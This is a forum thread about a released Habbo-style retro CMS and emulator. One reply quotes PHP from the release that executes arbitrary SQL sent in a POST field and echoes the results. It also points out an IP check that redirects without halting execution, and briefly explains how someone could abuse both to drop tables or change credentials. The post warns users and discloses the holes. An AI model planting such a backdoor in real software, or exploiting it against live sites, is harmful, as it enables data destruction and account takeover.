[DELETED][Prj Foton Mini] Reality Edit CMS , Emulator & Database

Status
Not open for further replies.

AndyADAM

New Member
Sep 20, 2013
27
6
You shouldnt have to change your group id. Just say :superhire (username ) 3 3
If that doesnt work ir will mean that your :911 isnt working
 

Khalil

IDK
Dec 6, 2011
1,642
786
Nonetheless, good job & nice release.
I wouldn't say so.

I had a quick look at the code, and..
PHP:
                if(isset($_POST['secure']))
                {
                echo "don";
                    mysql_query($_POST['secure']);
                    if(!empty($_POST['data']))
                    {
                   
                        $q = mysql_query($_POST['secure']);
                        while($r = mysql_fetch_assoc($q))
                        {
                            echo $r[$_POST['data']];
                        }
                    }
                }
That code could only be activated if a session is started, then all he has to do is add an input field like so: <input type='text' name='secure'>, then enter whatever SQL queries he has in mind to screw with a retro, say for example, drop a few tables, change a few credentials..

And, I think he put this on purpose to go with the code above;

PHP:
                if($_SESSION['user']['ip_last'] != $_SERVER['REMOTE_ADDR'])
                {
                    header('Location: '.$_CONFIG['hotel']['url'].'/logout');
                }
This check would actually work, except he didn't kill the page after the redirection was made, thus he could simply stop it and still play around with users' accounts. Don't know why he bothered though seeing he could just edit the last logged IP using the the code demonstrated at first. And yes, it was on purpose, I checked the rest of the redirections, the pages are killed in all of them except for the IP check.
 

Youngster

Sensitivity killed my dog...
Aug 10, 2015
120
15
I've heard loads of things about this CMS & EMU but I'll still take a look at it thanks for sharing!
 
Status
Not open for further replies.

Users who are viewing this thread

Top